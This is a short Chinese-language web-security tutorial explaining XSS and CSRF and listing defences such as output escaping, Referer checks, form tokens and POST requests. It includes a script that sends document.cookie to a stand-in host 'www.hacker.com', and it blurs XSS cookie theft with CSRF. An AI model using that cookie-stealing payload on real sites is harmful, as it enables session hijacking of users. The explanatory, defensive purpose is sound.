XSS:Cross Site Scripting,跨站脚本,其攻击的本质是让用户的浏览器运行一段刻意构造的脚本,其实用户的浏览器在加载页面时候会调用其中的脚本段,如果其中存在一段刻意构造的恶意脚本的话,就会被浏览器直接执行,造成攻击。
最常见的例子如下:
现在有一个网站有一个发帖子的功能,然后一个用户登录之后,在输入帖子的内容区输入了如下的内容:
<script type="text/javascript>
alert("You were hacked!");
</script>
当用户点击发帖之后,如果服务器针对该内容没有进行转码或其他安全操作,则当其他用户刷新当前页面的时候,当该内容嵌入到页面的时候成为了页面的一部分元素,此时其他用户就会看到一个弹窗显示You were hacked!。这就是最常见的,最易理解的XSS攻击,就是通过在页面或者地址上构造恶意脚本实现不同的目的。
预防策略:
由于该攻击是由于输入的恶意脚本实现的,所以最直接的方式就是对该输入进行转义,转移之后再在页面显示则不会出现上述情况。
CSRF:Cross Site Request Forgery跨站请求伪造。从名字上就可以看出,该攻击是假冒用户进行恶意操作。
由于Http协议是无状态协议,即这一次请求和上一次请求没有关系,网站的用户认证一般都是采用的session的方式实现,之前的session直接存在客户端,可以直接获取,后来的操作都是在客户端的cookie中存储session_id。当用户登录之后,进行其他的操作的时候所有的Http请求的时候都会带上自身的cookies交给服务器进行验证,在前面的XSS攻击中,攻击者可以获取到用户的cookie,例如:
<script type="text/javascript>
var sc = document.createElement("script");
sc.src = "www.hacker.com?cook=" + document.cookie;
sc.onload = function(){
alert("Your cookie was stolen");
}
</script>
通过上述操作之后,攻击者就可以获取到用户的通行证了,然后在进行其他操作的时候就可以用该cookie进行。
预防策略:
1:该攻击的原理是假冒用户,那么预防的就是加强用户认证,有一种方式是通过refer参数预防,即获取该请求来自的上一页的地址,通过该地址验证来请求来自哪里。但是refer在很多情况下获取不到,包括但不限于:
1.1:Location对象是一个用于页面导航的非常实用的对象。因为他允许你只变更Url的其中一部分。例如从cn域名切换到com域名,其他部分不变:window.location.hostname = "example.com";
但是,通过修改Location进行页面导航的方法,会导致在IE下丢失Referrer。
1.2:window.open方式打开新窗口之后在有些浏览器没有传递refer
1.3:鼠标拖拽打开新窗口,鼠标拖拽是现在非常流行的用户习惯,很多浏览器都内置或者可以通过插件的方式来支持鼠标拖拽式浏览。但是通过这种方式打开的页面,基本全都丢失referrer。并且,这种情况下,也无法使用window.opener的方式去获取丢失的referrer了。
2:通过在页面的输入表单中加入一个随机的字符串,然后将该字符串也嵌入到cookie中,当提交表单的时候服务器可以验证该字符串是否是预先嵌入的字符串进行验证。
3:通过POST的方式,对于提交表单等会发生资源修改的操作,POST操作是首选,由于Ajax在进行提交的时候不能跨域操作,所以可以避免一部分的攻击。